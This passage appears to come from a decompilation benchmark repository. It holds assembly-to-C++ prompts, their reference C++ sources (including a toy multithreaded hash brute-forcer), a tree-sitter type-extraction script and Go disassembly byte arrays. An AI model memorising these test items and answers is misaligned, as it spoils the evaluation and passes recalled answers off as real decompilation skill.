"ABCDEFGHIJKLMNOPQRSTUVWXYZ" 199 | 0040601f ds "c:l:h:" 200 | 0040a1c0 undefined8 0000000000000000h 201 | 0040a1c0 undefined8 0000000000000000h 202 | 0040a1c0 undefined8 0000000000000000h 203 | 0040a200 undefined1[272] 204 | 00406026 ds "Missing argument for %c" 205 | 0040a1c8 undefined4 00000000h 206 | 0040a200 undefined1[272] 207 | 0040603e ds "Usage: ./cracker -h 0xhash [-c charset] [-l length]\n" 208 | 0040a200 undefined1[272] 209 | 00406073 ds "[*] Cracked: " 210 | 0040a3c0 undefined1[32] 211 | 212 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcC function. The C++ code is idiomatic and uses standard libraries and range based loops. -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/rumrum_produce_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcD(string charset, int length): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x90 7 | MOV qword ptr [RBP + -0x78],RDI 8 | MOV dword ptr [RBP + -0x4],ESI 9 | LAB_00402782: 10 | MOV ESI,0x40a380 11 | LEA RDI,[RBP + -0x18] 12 | MOV qword ptr [RBP + -0x80],RDI 13 | CALL std::unique_lock::unique_lock 14 | MOV RSI,qword ptr [RBP + -0x80] 15 | LAB_00402798: 16 | MOV EDI,0x40a320 17 | CALL std::condition_variable::wait<(lambda_at_source.cpp:43:29)> 18 | JMP LAB_004027a7 19 | LAB_004027a7: 20 | MOV EDI,0x40a3c0 21 | MOV ESI,0x406072 22 | CALL std::operator!=,_std::allocator_> 23 | MOV CL,AL 24 | MOV byte ptr [RBP + -0x81],CL 25 | JMP LAB_004027c3 26 | LAB_004027c3: 27 | MOV AL,byte ptr [RBP + -0x81] 28 | TEST AL,0x1 29 | JNZ LAB_004027d6 30 | JMP LAB_004027f3 31 | LAB_004027d6: 32 | MOV dword ptr [RBP + -0x30],0x1 33 | JMP LAB_00402863 34 | LAB_004027f3: 35 | MOV RSI,qword ptr [RBP + -0x78] 36 | LEA RDI,[RBP + -0x70] 37 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 38 | JMP LAB_00402805 39 | LAB_00402805: 40 | MOV EDX,dword ptr [RBP + -0x4] 41 | LAB_00402808: 42 | LEA RDI,[RBP + -0x50] 43 | LEA RSI,[RBP + -0x70] 44 | CALL gen_random 45 | JMP LAB_0040281a 46 | LAB_0040281a: 47 | MOV EDI,0x40a3a8 48 | LEA RSI,[RBP + -0x50] 49 | CALL std::vector,_std::allocator_>,_std::allocator,_std::allocator_>_>_>::push_back 50 | JMP LAB_0040282d 51 | LAB_0040282d: 52 | LEA RDI,[RBP + -0x50] 53 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 54 | LEA RDI,[RBP + -0x70] 55 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 56 | LAB_0040283f: 57 | LEA RDI,[RBP + -0x18] 58 | CALL std::unique_lock::unlock 59 | LAB_00402848: 60 | JMP LAB_0040284d 61 | LAB_0040284d: 62 | MOV RDI,0x40a350 63 | CALL std::condition_variable::notify_one 64 | MOV dword ptr [RBP + -0x30],0x0 65 | LAB_00402863: 66 | LEA RDI,[RBP + -0x18] 67 | CALL std::unique_lock::~unique_lock 68 | MOV EAX,dword ptr [RBP + -0x30] 69 | TEST EAX,EAX 70 | JZ LAB_00402881 71 | JMP LAB_0040287c 72 | LAB_0040287c: 73 | JMP LAB_004028c3 74 | LAB_00402881: 75 | JMP LAB_00402782 76 | LAB_004028c3: 77 | ADD RSP,0x90 78 | POP RBP 79 | RET 80 | //end of function funcD 81 | 82 | Reference Table: 83 | Address Data 84 | 0040a380 mutex 85 | 0040a320 condition_variable 86 | 0040a3c0 undefined1[32] 87 | 0040a3a8 vector,_std::allocator_>,_std::allocator,_std::allocator_>_>_> 88 | 0040a350 condition_variable 89 | 90 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcD function. The C++ code is idiomatic and uses standard libraries and range based loops. -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/yurlungur_mutate_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcE(RNG * rng, uchar * state): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x30 7 | MOV qword ptr [RBP + -0x8],RDI 8 | MOV qword ptr [RBP + -0x10],RSI 9 | LEA RDI,[RBP + -0x18] 10 | XOR ESI,ESI 11 | MOV EDX,0x2 12 | CALL std::uniform_int_distribution::uniform_int_distribution 13 | LEA RDI,[RBP + -0x20] 14 | XOR ESI,ESI 15 | MOV EDX,0x1 16 | CALL std::uniform_int_distribution::uniform_int_distribution 17 | MOV RAX,qword ptr [RBP + -0x10] 18 | MOV qword ptr [RBP + -0x30],RAX 19 | MOV RSI,qword ptr [RBP + -0x8] 20 | LEA RDI,[RBP + -0x18] 21 | CALL std::uniform_int_distribution::operator()_> 22 | MOV ECX,EAX 23 | MOV RAX,qword ptr [RBP + -0x30] 24 | MOVSXD RCX,ECX 25 | ADD RAX,RCX 26 | MOV qword ptr [RBP + -0x28],RAX 27 | MOV RSI,qword ptr [RBP + -0x8] 28 | LEA RDI,[RBP + -0x20] 29 | CALL std::uniform_int_distribution::operator()_> 30 | MOV EDX,EAX 31 | SHL EDX,0x1 32 | SUB EDX,0x1 33 | MOV RAX,qword ptr [RBP + -0x28] 34 | MOVZX ECX,byte ptr [RAX] 35 | ADD ECX,EDX 36 | MOV byte ptr [RAX],CL 37 | MOV RAX,qword ptr [RBP + -0x28] 38 | MOVZX EAX,byte ptr [RAX] 39 | CMP EAX,0x9 40 | JLE LAB_0040150c 41 | MOV RAX,qword ptr [RBP + -0x28] 42 | MOV byte ptr [RAX],0x1 43 | LAB_0040150c: 44 | MOV RAX,qword ptr [RBP + -0x28] 45 | MOVZX EAX,byte ptr [RAX] 46 | CMP EAX,0x5 47 | JLE LAB_00401523 48 | MOV RAX,qword ptr [RBP + -0x28] 49 | MOV byte ptr [RAX],0x4 50 | LAB_00401523: 51 | ADD RSP,0x30 52 | POP RBP 53 | RET 54 | //end of function funcE 55 | 56 | Reference Table: 57 | Address Data 58 | 59 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcE function. The C++ code is idiomatic and uses standard libraries and range based loops. -------------------------------------------------------------------------------- /eval/cpp_corpus/source/baby_cpp_main_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char** argv) { 5 | if(argc != 2) { 6 | std::cerr << "USAGE: ./grade n" << std::endl; 7 | std::exit(2); 8 | } 9 | 10 | int num = std::atoi(argv[1]); 11 | int sum = 1; 12 | 13 | if(num <= 0) { 14 | std::cerr << "Don't be so negative." << std::endl; 15 | std::exit(2); 16 | } 17 | 18 | for(int i = std::sqrt(num); i > 1; --i) { 19 | if(num % i == 0) { 20 | sum += num / i; 21 | sum += i; 22 | } 23 | } 24 | 25 | if(sum == num) { 26 | std::cout << "Perfect!" << std::endl; 27 | return 0; 28 | } 29 | else { 30 | std::cout << "Needs improvement." << std::endl; 31 | return 1; 32 | } 33 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/blaise_main_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char** argv) { 4 | int64_t a = 0; 5 | int64_t z = -1; 6 | 7 | if(argc == 3) { 8 | a = atoll(argv[1]); 9 | z = atoll(argv[2]); 10 | } 11 | else if(argc == 2) { 12 | z = atoll(argv[1]); 13 | } 14 | 15 | if(a < 0 || z < 0 || a > z) { 16 | std::cerr << "USAGE: ./blaise (range)" << std::endl; 17 | std::exit(1); 18 | } 19 | 20 | for(int64_t row = a; row <= z; ++row) { 21 | int64_t val = 1; 22 | int64_t mul = row; 23 | int64_t div = 1; 24 | 25 | while(mul != 0) { 26 | std::cout << val << '\t'; 27 | 28 | val *= mul; 29 | val /= div; 30 | mul -= 1; 31 | div += 1; 32 | } 33 | 34 | std::cout << 1 << std::endl; 35 | } 36 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/rumrum_main_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include /* getopt */ 7 | 8 | #define BUFSIZE 128 9 | 10 | std::condition_variable not_full; 11 | std::condition_variable not_empty; 12 | std::mutex mutex; 13 | std::vector buffer; 14 | std::string FOUND = ""; 15 | 16 | int main(int argc, char **argv) { 17 | int opt; 18 | int length = 4; 19 | uint32_t hash = 0; 20 | std::string charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 21 | 22 | while ((opt = getopt(argc, argv, "c:l:h:")) != -1){ 23 | switch (opt) 24 | { 25 | case 'c': 26 | charset = std::string(optarg); 27 | break; 28 | case 'l': 29 | length = std::atoi(optarg); 30 | break; 31 | case 'h': 32 | hash = std::stoul(optarg, nullptr, 0); 33 | break; 34 | case ':': 35 | std::cout << "Missing argument for %c" << optopt << "\n"; 36 | break; 37 | } 38 | } 39 | 40 | if(hash == 0){ 41 | std::cout << "Usage: ./cracker -h 0xhash [-c charset] [-l length]\n"; 42 | return -1; 43 | } 44 | 45 | std::thread producer = std::thread(produce, charset, length); 46 | std::thread consumer = std::thread(consume, hash); 47 | 48 | producer.join(); 49 | consumer.join(); 50 | 51 | std::cout << "[*] Cracked: " << FOUND << "\n"; 52 | 53 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/rumrum_produce_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include /* getopt */ 7 | 8 | #define BUFSIZE 128 9 | 10 | std::condition_variable not_full; 11 | std::condition_variable not_empty; 12 | std::mutex mutex; 13 | std::vector buffer; 14 | std::string FOUND = ""; 15 | 16 | void produce(std::string charset, const int length) { 17 | while(true){ 18 | std::unique_lock lock(mutex); 19 | 20 | not_full.wait(lock, [](){ 21 | return buffer.size() != BUFSIZE || FOUND == ""; 22 | }); 23 | 24 | if(FOUND != "") return; 25 | 26 | buffer.push_back(gen_random(charset, length)); 27 | lock.unlock(); 28 | not_empty.notify_one(); 29 | } 30 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/yurlungur_mutate_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using RNG = std::mt19937_64; 5 | 6 | void mutate(RNG& rng, unsigned char state[3]) { 7 | std::uniform_int_distribution index(0, 2); 8 | std::uniform_int_distribution delta(0, 1); 9 | 10 | unsigned char& c = state[index(rng)]; 11 | c += 2 * delta(rng) - 1; 12 | 13 | if(c > 9) c = 1; 14 | if(c > 5) c = 4; 15 | } -------------------------------------------------------------------------------- /eval/extract_type.py: -------------------------------------------------------------------------------- 1 | # This script extracts all the unique type names of an AST from a json file (node-types.json) of the tree-sitter library. 2 | import json 3 | 4 | def extract_unique_types(filename): 5 | with open(filename, 'r') as f: 6 | data = json.load(f) 7 | 8 | unique_types = set() 9 | extract_types(data, unique_types) 10 | 11 | return list(unique_types) 12 | 13 | def extract_types(item, unique_types): 14 | if isinstance(item, dict): 15 | for key, value in item.items(): 16 | if key == 'type': 17 | if isinstance(value, str): 18 | unique_types.add(value) 19 | extract_types(value, unique_types) 20 | elif isinstance(item, list): 21 | for i in item: 22 | extract_types(i, unique_types) 23 | 24 | filename = 'cpp-types.json' 25 | unique_types = extract_unique_types(filename) 26 | for typ in unique_types: 27 | print(typ) 28 | -------------------------------------------------------------------------------- /eval/go_corpus/disasm/baby_go_main_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 132, 36, 16, 255, 255, 255, 72, 59, 65, 16, 15, 134, 165, 3, 0, 0, 72, 129, 236, 112, 1, 0, 0, 72, 137, 172, 36, 104, 1, 0, 0, 72, 141, 172, 36, 104, 1, 0, 0, 72, 139, 5, 159, 93, 13, 0, 72, 137, 132, 36, 144, 0, 0, 0, 144, 72, 199, 132, 36, 16, 1, 0, 0, 0, 0, 0, 0, 72, 141, 188, 36, 24, 1, 0, 0, 15, 87, 192, 72, 141, 127, 208, 72, 137, 108, 36, 240, 72, 141, 108, 36, 240, 232, 89, 66, 252, 255, 72, 139, 109, 0, 72, 141, 13, 121, 39, 1, 0, 72, 137, 12, 36, 72, 199, 68, 36, 8, 0, 16, 0, 0, 72, 199, 68, 36, 16, 0, 16, 0, 0, 232, 46, 207, 250, 255, 72, 139, 68, 36, 24, 72, 199, 132, 36, 184, 0, 0, 0, 0, 0, 0, 0, 72, 141, 188, 36, 192, 0, 0, 0, 15, 87, 192, 72, 141, 127, 208, 72, 137, 108, 36, 240, 72, 141, 108, 36, 240, 232, 4, 66, 252, 255, 72, 139, 109, 0, 72, 137, 132, 36, 184, 0, 0, 0, 72, 199, 132, 36, 192, 0, 0, 0, 0, 16, 0, 0, 72, 199, 132, 36, 200, 0, 0, 0, 0, 16, 0, 0, 72, 141, 5, 228, 249, 4, 0, 72, 137, 132, 36, 208, 0, 0, 0, 72, 139, 132, 36, 144, 0, 0, 0, 72, 137, 132, 36, 216, 0, 0, 0, 72, 199, 132, 36, 0, 1, 0, 0, 255, 255, 255, 255, 72, 199, 132, 36, 8, 1, 0, 0, 255, 255, 255, 255, 72, 139, 132, 36, 184, 0, 0, 0, 72, 137, 132, 36, 16, 1, 0, 0, 72, 141, 188, 36, 24, 1, 0, 0, 72, 141, 180, 36, 192, 0, 0, 0, 72, 137, 108, 36, 240, 72, 141, 108, 36, 240, 232, 223, 68, 252, 255, 72, 139, 109, 0, 15, 87, 201, 15, 17, 140, 36, 168, 0, 0, 0, 72, 141, 5, 79, 37, 1, 0, 72, 137, 132, 36, 168, 0, 0, 0, 72, 141, 13, 96, 226, 4, 0, 72, 137, 140, 36, 176, 0, 0, 0, 72, 139, 13, 97, 92, 13, 0, 72, 141, 21, 106, 249, 4, 0, 72, 137, 20, 36, 72, 137, 76, 36, 8, 72, 141, 140, 36, 168, 0, 0, 0, 72, 137, 76, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 221, 116, 255, 255, 144, 72, 141, 132, 36, 16, 1, 0, 0, 72, 137, 4, 36, 198, 68, 36, 8, 10, 232, 246, 229, 255, 255, 72, 139, 68, 36, 24, 72, 139, 76, 36, 16, 72, 139, 84, 36, 32, 72, 141, 92, 36, 96, 72, 137, 28, 36, 72, 137, 76, 36, 8, 72, 137, 68, 36, 16, 72, 137, 84, 36, 24, 232, 58, 13, 251, 255, 72, 139, 68, 36, 32, 72, 137, 132, 36, 136, 0, 0, 0, 72, 139, 76, 36, 40, 72, 137, 76, 36, 80, 49, 210, 233, 130, 0, 0, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 232, 158, 143, 247, 255, 72, 139, 68, 36, 16, 15, 87, 192, 15, 17, 132, 36, 152, 0, 0, 0, 72, 141, 13, 119, 36, 1, 0, 72, 137, 140, 36, 152, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 72, 139, 5, 144, 91, 13, 0, 72, 141, 21, 153, 248, 4, 0, 72, 137, 20, 36, 72, 137, 68, 36, 8, 72, 141, 132, 36, 152, 0, 0, 0, 72, 137, 68, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 12, 116, 255, 255, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 76, 36, 80, 72, 139, 84, 36, 88, 72, 57, 202, 15, 141, 17, 1, 0, 0, 15, 182, 28, 16, 129, 251, 128, 0, 0, 0, 15, 141, 224, 0, 0, 0, 72, 255, 194, 137, 92, 36, 68, 72, 137, 84, 36, 88, 72, 199, 4, 36, 0, 0, 0, 0, 72, 99, 195, 72, 137, 68, 36, 8, 232, 128, 18, 251, 255, 72, 139, 68, 36, 16, 72, 139, 76, 36, 24, 139, 84, 36, 68, 15, 186, 226, 0, 15, 130, 153, 0, 0, 0, 129, 250, 255, 0, 0, 0, 119, 85, 15, 182, 210, 72, 141, 29, 246, 61, 12, 0, 15, 182, 20, 26, 131, 226, 96, 128, 250, 32, 15, 148, 194, 132, 210, 116, 29, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 247, 249, 255, 255, 72, 139, 68, 36, 24, 72, 139, 76, 36, 16, 233, 236, 254, 255, 255, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 234, 246, 255, 255, 72, 139, 76, 36, 16, 72, 139, 68, 36, 24, 233, 207, 254, 255, 255, 72, 137, 132, 36, 128, 0, 0, 0, 72, 137, 76, 36, 72, 72, 139, 5, 87, 240, 12, 0, 72, 137, 4, 36, 137, 84, 36, 8, 232, 26, 178, 253, 255, 15, 182, 84, 36, 16, 72, 139, 132, 36, 128, 0, 0, 0, 72, 139, 76, 36, 72, 72, 141, 29, 113, 61, 12, 0, 235, 134, 72, 137, 194, 72, 137, 200, 72, 137, 209, 233, 133, 254, 255, 255, 72, 137, 4, 36, 72, 137, 76, 36, 8, 72, 137, 84, 36, 16, 232, 30, 204, 251, 255, 139, 92, 36, 24, 72, 139, 84, 36, 32, 233, 2, 255, 255, 255, 72, 139, 172, 36, 104, 1, 0, 0, 72, 129, 196, 112, 1, 0, 0, 195, 232, 219, 21, 252, 255, 233, 54, 252, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/disasm/cartree_main_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 68, 36, 240, 72, 59, 65, 16, 15, 134, 239, 2, 0, 0, 72, 129, 236, 144, 0, 0, 0, 72, 137, 172, 36, 136, 0, 0, 0, 72, 141, 172, 36, 136, 0, 0, 0, 72, 141, 5, 90, 25, 1, 0, 72, 137, 4, 36, 232, 225, 0, 247, 255, 72, 139, 68, 36, 8, 72, 137, 68, 36, 112, 49, 201, 49, 210, 233, 204, 0, 0, 0, 72, 139, 9, 72, 133, 201, 116, 12, 72, 139, 16, 72, 57, 81, 24, 127, 239, 72, 133, 201, 15, 132, 184, 1, 0, 0, 72, 137, 76, 36, 80, 72, 139, 16, 72, 137, 84, 36, 72, 72, 139, 89, 16, 72, 137, 92, 36, 88, 72, 141, 53, 167, 103, 2, 0, 72, 137, 52, 36, 232, 142, 0, 247, 255, 72, 139, 124, 36, 8, 72, 139, 68, 36, 72, 72, 137, 71, 24, 144, 131, 61, 40, 151, 15, 0, 0, 15, 133, 84, 1, 0, 0, 72, 139, 76, 36, 88, 72, 137, 79, 8, 72, 133, 201, 116, 16, 131, 61, 13, 151, 15, 0, 0, 15, 133, 38, 1, 0, 0, 72, 137, 57, 144, 131, 61, 252, 150, 15, 0, 0, 15, 133, 249, 0, 0, 0, 72, 199, 71, 16, 0, 0, 0, 0, 144, 131, 61, 230, 150, 15, 0, 0, 15, 133, 196, 0, 0, 0, 72, 139, 68, 36, 80, 72, 137, 120, 16, 72, 133, 255, 116, 16, 131, 61, 203, 150, 15, 0, 0, 15, 133, 159, 0, 0, 0, 72, 137, 7, 72, 139, 68, 36, 96, 72, 137, 249, 72, 137, 194, 72, 139, 68, 36, 112, 72, 137, 84, 36, 96, 72, 137, 76, 36, 104, 15, 87, 192, 15, 17, 68, 36, 120, 72, 141, 29, 185, 196, 0, 0, 72, 137, 92, 36, 120, 72, 137, 132, 36, 128, 0, 0, 0, 72, 139, 53, 141, 220, 13, 0, 72, 141, 61, 126, 24, 5, 0, 72, 137, 60, 36, 72, 137, 116, 36, 8, 72, 141, 116, 36, 120, 72, 137, 116, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 84, 159, 255, 255, 72, 139, 68, 36, 48, 72, 131, 248, 0, 72, 131, 124, 36, 40, 1, 15, 133, 42, 1, 0, 0, 72, 131, 248, 0, 15, 133, 32, 1, 0, 0, 72, 139, 68, 36, 112, 72, 139, 76, 36, 104, 233, 171, 254, 255, 255, 232, 241, 125, 251, 255, 233, 90, 255, 255, 255, 72, 139, 76, 36, 80, 72, 141, 81, 16, 72, 137, 248, 72, 137, 215, 232, 216, 125, 251, 255, 72, 137, 199, 72, 137, 200, 233, 38, 255, 255, 255, 72, 141, 79, 16, 72, 137, 248, 72, 137, 207, 72, 137, 194, 49, 192, 232, 185, 125, 251, 255, 72, 137, 215, 233, 243, 254, 255, 255, 72, 137, 248, 72, 137, 207, 232, 166, 125, 251, 255, 72, 137, 199, 233, 202, 254, 255, 255, 72, 141, 87, 8, 72, 137, 248, 72, 137, 215, 72, 137, 193, 72, 139, 68, 36, 88, 232, 135, 125, 251, 255, 72, 137, 207, 72, 137, 193, 233, 147, 254, 255, 255, 72, 139, 8, 72, 137, 76, 36, 64, 72, 141, 21, 253, 101, 2, 0, 72, 137, 20, 36, 232, 228, 254, 246, 255, 72, 139, 68, 36, 8, 72, 139, 76, 36, 64, 72, 137, 72, 24, 144, 131, 61, 126, 149, 15, 0, 0, 117, 78, 72, 139, 124, 36, 96, 72, 137, 120, 8, 72, 133, 255, 116, 12, 131, 61, 103, 149, 15, 0, 0, 117, 48, 72, 137, 7, 144, 131, 61, 90, 149, 15, 0, 0, 117, 16, 72, 199, 64, 16, 0, 0, 0, 0, 72, 137, 199, 233, 139, 254, 255, 255, 72, 141, 120, 16, 72, 137, 193, 49, 192, 232, 10, 125, 251, 255, 72, 137, 200, 235, 229, 232, 0, 125, 251, 255, 235, 204, 72, 141, 120, 8, 72, 137, 193, 72, 139, 68, 36, 96, 232, 237, 124, 251, 255, 72, 137, 199, 72, 137, 200, 235, 162, 72, 139, 68, 36, 96, 72, 137, 4, 36, 232, 87, 250, 255, 255, 144, 72, 139, 5, 15, 219, 13, 0, 72, 141, 13, 24, 23, 5, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 72, 199, 68, 36, 16, 0, 0, 0, 0, 15, 87, 192, 15, 17, 68, 36, 24, 232, 217, 27, 255, 255, 72, 139, 172, 36, 136, 0, 0, 0, 72, 129, 196, 144, 0, 0, 0, 195, 232, 148, 94, 251, 255, 233, 239, 252, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/disasm/goalie_main_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 68, 36, 216, 72, 59, 65, 16, 15, 134, 220, 4, 0, 0, 72, 129, 236, 168, 0, 0, 0, 72, 137, 172, 36, 160, 0, 0, 0, 72, 141, 172, 36, 160, 0, 0, 0, 72, 139, 13, 194, 246, 14, 0, 72, 139, 61, 179, 246, 14, 0, 72, 133, 201, 15, 134, 166, 4, 0, 0, 72, 199, 71, 8, 6, 0, 0, 0, 131, 61, 171, 175, 16, 0, 0, 15, 133, 115, 4, 0, 0, 72, 141, 5, 158, 203, 3, 0, 72, 137, 7, 144, 72, 139, 5, 51, 242, 14, 0, 72, 137, 4, 36, 72, 141, 5, 4, 199, 3, 0, 72, 137, 68, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 128, 66, 183, 18, 72, 141, 5, 119, 215, 3, 0, 72, 137, 68, 36, 32, 72, 199, 68, 36, 40, 11, 0, 0, 0, 232, 23, 190, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 132, 36, 128, 0, 0, 0, 72, 139, 13, 226, 241, 14, 0, 72, 137, 12, 36, 72, 141, 13, 186, 198, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 40, 0, 0, 0, 72, 141, 13, 191, 201, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 5, 0, 0, 0, 232, 22, 189, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 88, 72, 139, 13, 148, 241, 14, 0, 72, 137, 12, 36, 72, 141, 13, 102, 198, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 20, 0, 0, 0, 72, 141, 13, 215, 202, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 6, 0, 0, 0, 232, 200, 188, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 120, 72, 139, 13, 70, 241, 14, 0, 72, 137, 12, 36, 72, 141, 13, 26, 198, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 0, 0, 0, 0, 72, 141, 13, 119, 202, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 6, 0, 0, 0, 232, 122, 188, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 112, 72, 139, 13, 248, 240, 14, 0, 72, 137, 12, 36, 72, 141, 13, 205, 197, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 198, 68, 36, 24, 0, 72, 141, 13, 177, 200, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 5, 0, 0, 0, 232, 208, 186, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 104, 72, 139, 13, 174, 240, 14, 0, 72, 137, 12, 36, 72, 141, 13, 132, 197, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 0, 0, 0, 0, 72, 141, 13, 45, 199, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 4, 0, 0, 0, 232, 50, 187, 255, 255, 144, 72, 139, 68, 36, 48, 72, 139, 13, 181, 244, 14, 0, 72, 139, 21, 182, 244, 14, 0, 72, 139, 29, 183, 244, 14, 0, 72, 131, 250, 1, 15, 130, 140, 2, 0, 0, 72, 137, 68, 36, 96, 72, 139, 5, 65, 240, 14, 0, 72, 137, 4, 36, 72, 141, 67, 255, 72, 137, 195, 72, 247, 216, 72, 193, 248, 63, 72, 131, 224, 16, 72, 1, 200, 72, 137, 68, 36, 8, 72, 141, 66, 255, 72, 137, 68, 36, 16, 72, 137, 92, 36, 24, 232, 64, 206, 255, 255, 72, 139, 68, 36, 96, 72, 139, 0, 72, 133, 192, 15, 133, 18, 2, 0, 0, 232, 90, 118, 254, 255, 72, 139, 68, 36, 8, 72, 139, 12, 36, 72, 15, 186, 225, 63, 15, 131, 235, 1, 0, 0, 72, 137, 200, 72, 209, 225, 72, 193, 233, 31, 72, 186, 128, 127, 177, 215, 13, 0, 0, 0, 72, 1, 209, 72, 139, 21, 208, 239, 14, 0, 72, 137, 20, 36, 72, 105, 201, 0, 202, 154, 59, 72, 37, 255, 255, 255, 63, 72, 99, 192, 72, 1, 200, 72, 185, 0, 0, 26, 61, 235, 3, 178, 161, 72, 1, 200, 72, 137, 68, 36, 8, 232, 234, 222, 255, 255, 199, 4, 36, 8, 0, 0, 0, 72, 141, 5, 4, 65, 4, 0, 72, 137, 68, 36, 8, 72, 139, 68, 36, 112, 72, 137, 68, 36, 16, 232, 40, 168, 248, 255, 72, 139, 68, 36, 88, 72, 139, 0, 72, 139, 76, 36, 120, 72, 139, 9, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 90, 251, 255, 255, 72, 139, 68, 36, 16, 72, 137, 132, 36, 136, 0, 0, 0, 72, 137, 4, 36, 232, 36, 245, 255, 255, 72, 139, 68, 36, 112, 72, 139, 140, 36, 136, 0, 0, 0, 49, 210, 235, 28, 72, 139, 92, 36, 80, 72, 141, 83, 1, 72, 139, 92, 36, 112, 72, 139, 180, 36, 136, 0, 0, 0, 72, 137, 216, 72, 137, 241, 72, 137, 84, 36, 80, 72, 139, 24, 72, 133, 219, 15, 133, 221, 0, 0, 0, 72, 137, 12, 36, 232, 189, 245, 255, 255, 72, 139, 68, 36, 104, 128, 56, 0, 117, 192, 72, 139, 76, 36, 80, 72, 133, 201, 117, 44, 72, 139, 132, 36, 136, 0, 0, 0, 72, 137, 4, 36, 232, 232, 242, 255, 255, 72, 139, 132, 36, 128, 0, 0, 0, 72, 139, 8, 72, 137, 12, 36, 232, 180, 222, 249, 255, 72, 139, 68, 36, 104, 235, 138, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 72, 8, 72, 255, 201, 72, 137, 12, 36, 232, 5, 5, 246, 255, 72, 139, 68, 36, 8, 15, 87, 192, 15, 17, 132, 36, 144, 0, 0, 0, 72, 141, 13, 14, 68, 1, 0, 72, 137, 140, 36, 144, 0, 0, 0, 72, 137, 132, 36, 152, 0, 0, 0, 72, 139, 5, 151, 238, 14, 0, 72, 141, 21, 144, 138, 5, 0, 72, 137, 20, 36, 72, 137, 68, 36, 8, 72, 141, 5, 2, 198, 3, 0, 72, 137, 68, 36, 16, 72, 199, 68, 36, 24, 5, 0, 0, 0, 72, 141, 156, 36, 144, 0, 0, 0, 72, 137, 92, 36, 32, 72, 199, 68, 36, 40, 1, 0, 0, 0, 72, 199, 68, 36, 48, 1, 0, 0, 0, 232, 46, 8, 255, 255, 233, 64, 255, 255, 255, 72, 57, 218, 15, 130, 26, 255, 255, 255, 72, 139, 68, 36, 104, 128, 56, 0, 117, 16, 72, 139, 172, 36, 160, 0, 0, 0, 72, 129, 196, 168, 0, 0, 0, 195, 72, 137, 12, 36, 232, 13, 242, 255, 255, 235, 229, 72, 137, 194, 72, 137, 200, 72, 137, 209, 233, 30, 254, 255, 255, 144, 72, 139, 13, 237, 237, 14, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 232, 39, 221, 255, 255, 233, 56, 254, 255, 255, 72, 141, 5, 43, 199, 3, 0, 232, 54, 213, 250, 255, 233, 134, 251, 255, 255, 184, 